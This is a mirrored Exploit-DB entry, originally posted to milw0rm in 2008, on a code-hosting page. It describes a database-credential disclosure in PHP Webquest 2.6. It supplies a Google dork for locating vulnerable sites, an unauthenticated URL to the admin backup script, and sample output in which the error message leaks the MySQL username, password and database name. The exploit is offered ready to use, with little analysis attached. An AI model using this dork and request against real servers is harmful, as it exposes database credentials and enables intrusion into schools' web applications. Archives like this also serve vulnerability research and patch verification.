bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/4872.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

33 lines
1.5 KiB
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

--==+================================================================================+==--
--==+ PHP Webquest 2.6 Get Database's Credential +==--
--==+================================================================================+==--
Author: MhZ91
Title: PHP Webquest 2.6 Get Database's Credential
Download: http://phpwebquest.org/descargas/phpwebquest-2.6-international.zip
Bug: Get Database's Credential
Info: PHP Webquest is a free educational software developed in order to help those teachers who want to create their own activities without the need of wrtitng any HTML code or uploading files to a web server. If you want to install it at your schools server, please click on the image of the International Version.
Dork: "PHP WEBQUEST VERSION " or inurl:"/phpwebquest/"
Visit: http://www.inj3ct-it.org
[*]----------------------------------------------------------
Poc:
The exploit work only if the function system(); is enabled on the server.. because it return a message whit the db credentials..
We can get the file of the backup, and it return this:
<H1>Error ejecutando comando: /usr/bin/mysqldump -u xxx --password=xxx1 --opt xx2</H1>
Where xxx is the mysql login, xxx1 the password and xx2 the name of database.
[*]----------------------------------------------------------
Exploit:
http://[www.example.com]/admin/backup_phpwebquest.php
[*]----------------------------------------------------------
# milw0rm.com [2008-01-09]
Reference in a new issue View git blame Copy permalink